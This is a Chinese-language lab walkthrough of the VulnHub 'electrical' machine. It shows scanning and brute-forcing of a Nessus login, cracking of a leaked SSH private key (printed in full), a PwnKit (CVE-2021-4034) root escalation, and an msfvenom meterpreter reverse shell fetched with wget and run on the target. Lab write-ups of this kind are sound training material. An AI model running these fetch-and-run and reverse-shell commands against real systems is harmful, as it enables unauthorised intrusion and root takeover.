https://www.vulnhub.com/digitalworldlocal-electrical,747/选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
文件名:ELECTRICAL.7z文件大小:12 GBMD5:52A1BA392DAD4E47FAF3AC29C32A624FSHA1:6A0785D226BD311318648129BC53B7E136A5455D
无
获取root权限,共有两个flag。
普通用户:local.txtroot用户:proof.txt
确定IP地址、端口扫描、SMB探测、网站访问、目录扫描、暴力破解。
使用nmap确定该靶场IP地址,地址为:192.168.241.170。
namp -sP 192.168.241.0/24
使用nmap进行端口扫描,发现其开放22、113、139、445、8834和22222端口。
nmap -sV -v -T4 -A -P 192.168.241.170
AI总结一下:
使用enum4linux尝试进行用户枚举,发现两个共享:print$(用于打印驱动)和IPC$(进程间通信服务)。
enum4linux 192.168.241.170
还发现两个用户govindasamy和eletrical。
访问8834端口,发现是Nessus扫描器。
https://192.168.241.170:8834
扫描发现多个页面可访问,经过逐一访问并未发现可用信息。
dirsearch -u https://192.168.241.170:8834
既然已经知道用户名,尝试对其进行爆破。
发现账密为:govindasamy/password。
网站登录、发现SSH连接密钥、保存密钥信息、爆破密码、SSH连接进入靶机、查看local.txt文件、查阅本机其他信息、使用linpeash进行监测。
使用爆破的用户名和密码登录Nessus。
在扫描-认证检查-配置-描述中发现了SSH连接密钥。
Check on electrical servers!Log into "electrical" via SSH. We use the same private-public key pair across the network for convenience.We know you need to troubleshoot the servers sometimes, but do not necessary have the key. Here is the key:-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCN+0u3mqmCbqYwo4vCR1VqAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDbvoOZlrzDvS5ADlguD1jbgAqmXuOrPiS5IEsyN19zuDzYZL9XKcrsvlhzM8J8DdAG69pU/kLBdem/enZWa88B/LCYJWHKs3AnNzA9tsk6tM2PIKVWvoqG+e5DLc3TIb/48Y9MoCUUfpBp1uJJhWNk0r1ph2JWzXfNkUTXozNrwkToIJWlrwgxikfPU328xVNwW/zZdU3Az2TQZYyrcm3D9QT6NNSdml7bjh5ULYg4U6UBm6gwFtWFbcmEiST7ENJPSesyefJqGIL2VoXIsZC4A0ocW2teE/KIPQv+cbP0bKPHFD0B3xze8vhnHwJElE8pywMqgmn9VgPvMvv1+YBrAAAD0MV9eKrECZivMrABDFavCx4vvIAJOoB6EupNKtBOG310CQX0yp7DXbodZxMQf45CT6U7gh3R10igfmpAlUzabszxm91LTct9Ji/3YiQZHzEDF5wPvVzYOm2b4LYuRlSaOQ8hS1bNuxaWZRSyMA/MEr6GhhKoF1BtcbVGA7SMW4M6csx1KHRmaHhkd7XQl7UDxPglpyhVml5uWLLOv2zIx9XzgP6MXkXOKQk0A5lSbsQSP2b6HD2khc82kPLqzRZLyCw0+qv6QGL/M5wHQh13YVqQxYEYVFFKrw93fq5Ue9et/Pi0bhxOU8kmZOydYi4N4tq0GF3576DSJcACzUOaq84GxToBs0QOfamjA0JySip8fhH5hh1xTpoY9UIRyaoxqsak6x+CdRNoJJ3TipCo0S4u9fuWBRBC3lraX5FX/7VDnxOOhYtnoswke4KaMFM/IM0c6M91V3680OWWjrZBgjQse8tD2TP4/5PphMnCPlW2kTho99yEW7luDYOJBzbMo36VeE1fHzV0V+vfK5lwzom1Je0uwW+M8GC9J1PI+PLPgu0kFB73qi1A1PbznSoO8Np9W3+SvczxgZTp9mYNwY5UBIQVHEoHz9buiIRr5qaZYIqLcIX4RaWUAWhkeoMpnvWywNkc2m3Dej5y6vxD8VQ2o1hXcDL9DfjGGFVaT6ZvY2zRGX7m09IHbJkY9ZpGdAE4kR+AdcGLtv2S0FDHiJtXUiGLDrae6ALhUAAemZ51JOnKf8lhfC2O5nMN8VMV2Os7gPnjvz690COLVoj+Q40EwYTMP9B/Syk0KTLxB735eUCMmWDITdQRdGCRCXnnAxvdv/ARK5Avm7ujRp2u+T9mxuSk1d4Kp4Xaid6ymiTKbdAL9OuTGlGwyv23HVbnnOe3MJcDFBmNbDGCyAgQvfdG2cOrjk+4v+OUgAhJxYcR8UYKY+yLtt3bkZHZCYsEuRCmeovbBglAO1bdZoUD3IFdUmKF/VLhEK9Bi5np4zXfIodED2NWJYQEO++nPdmkPEf5reXRwVivL70sg2npED5LUCLlcUVztovjilIT3arJ9VBsT7QWyWow1dDTwibjUsnYftacrUbBjQH9b1sJGAtx1bmLMmwmqOVXkVv5RZ4vLXslKbgkO27r3UKjtOq/2Y0Kz54nFQ1ptoeh933ROjwOGoK48xwkG2oiuPpkkaEvv7b9W5hXMAy0huF9kuP5SIWHu8CNjD9GF/wV8NomDrl84BEU30Omd+RRX/kyNWWThhADa/z5o3pK9E9G9Jgp7VMUK7uEHXFBbIfttPJJOVk=-----END OPENSSH PRIVATE KEY-----
在登录信息中发现登录的用户名为electrical。
将获得到的连接密钥保存到OpenSSH.txt文件中。
使用ssh2john转化为SSH密钥为john可以破解的格式。
ssh2john OpenSSH.txt > OpenSSH-JM.txt使用john破解,得到electrical用户的密码为electrical。没想到用户名和密码相同……
john --wordlist=/usr/share/wordlists/rockyou.txt OpenSSH-Jm.txt
连接失败,原因:未给私钥权限。
重新起一个靶机重新进行以上操作。新靶机IP地址是192.168.241.171。
vim ia_Opensshchmod 600 ia_Opensshssh2john ia_Openssh > 123.txt
ssh electrical@192.168.241.171 -p 22222 -i ia_Openssh
lscat local.txt
查看本机有哪些用户。
ls -al /home
查看本机网络连接情况。
netstat -antulp
查看系统进程信息。
top
查看具有SUID权限的文件。
find / -perm -u=s -type f 2>/dev/null
查看内核版本及系统版本。
uname -auname -rcat /etc/issuecat /etc/*release
查看定时任务。
cat /etc/crontab
linpeaspython3 -m http.server 9876
wget http://192.168.241.138:9876/linpeas.sh
执行失败,添加可执行权限。
chmod +x linpeas.shls -l linpeas.sh./linpeas.sh
经过一圈检测,并未发现可利用条件。
网络查阅后,可采用CVE-2021-4034(PwnKit)漏洞。
下载编译文件,执行文件,获得flag。
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKitwget http://192.168.241.138:9876/PwnKit
chmod +x PwnKit./PwnKitidwhoami
cd ~cat proof.txt
恭喜您获得这台机器的root shell!
反弹shell生成命令,MSF生成脚本文件,靶机下载该脚本文件,开启监听执行脚本,使用suggester模块提权,提权成功。
网址:https://forum.ywhack.com/reverse-shell/生成shell脚本:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf生成主机监听命令:msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"
在MSF中依次运行以下命令。
msfconsolemsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf
生成reverse.elf文件。
开启临时http服务。
python3 -m http.server 9876
在靶机中下载该文件。
wget http://192.168.241.138:9876/reverse.elf
授予可执行权限。
ls -ll reverse.elfchmod +x reverse.elfls -ll reverse.elf
攻击机开启监听,随后在靶机中执行上传的revers.elf文件。
攻击机执行:msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"靶机执行:./reverse.elf
成功将shell反弹至MSF。
后台挂起session。
bg
search sugg
use 1set session 1run
共展示可以利用以下漏洞进行提权。
经过多次尝试,最后选择使用CVE-2021-4034漏洞。
shelllscd ~cat proof.txtid
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】digitalworld.local: electrical靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论